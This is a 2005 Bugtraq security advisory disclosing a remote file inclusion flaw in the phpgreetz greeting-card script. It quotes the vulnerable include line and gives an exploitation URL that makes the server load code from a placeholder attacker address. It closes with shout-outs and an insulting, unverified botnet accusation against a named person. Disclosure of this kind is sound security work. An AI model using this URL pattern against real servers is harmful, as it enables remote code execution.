[41364] in bugtraq
Remote file include in phpgreetz
daemon@ATHENA.MIT.EDU (gb.network@gmail.com)
Sat Nov 26 17:26:31 2005
Date: 26 Nov 2005 22:26:13 -0000
Message-ID: <20051126222613.21216.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: gb.network@gmail.com
To: bugtraq@securityfocus.com
Language: PHP
Script: phpgreetz
Version: 0.1a
Official website: http://sourceforge.net/projects/phpgreetz/
Problem: Remote file inclusion
Discovered by: beford & ][GB][
 
Description:
===========
Free greeting card website, being built and distributed as open source. 
Includes all functions and features to run a standalone site, including image uploading, 
user registration and profile management, mailing lists, image search engine, automatic thumb
 
Problem:
========
A remote user can include and execute arbitrary PHP code from the remote location.
The problem is in the file "content.php" at line 3:
include ($content);
 
Explotation example:
===================
http://[target]/path_to_phpgreetz/content.php?content=http://[attacker_url]
 
Solution:
========
 
Not solution at this time.
 
 
Greetz:
=======
 
uyx, beford, Zetha, lithyum,_|MALANDDO|_ ,desKrriado, |LINUX|, Amon-Ra, Extremo, SecretDreams, caffa
 
&& irc.gigachat.net #uruguay, #h4ck3rsbr, #IYS, #D.O.M, #MSR ,,, irc.fullnetwork.org #full, #f4kelive
   
irc.org.ve #uruguay, #venezuela
 
Fuckz:
=====
Morgan lamer and his irc.irc-argentina.org, his small ddos-botnet, its hidden in that server, the bot
s are
supposed to be argentinian users but noooo, he is using that ripped worm code i mentioned before!!!
he is such a leet h4x0r from santiago del estero (.ar)! hahahhaa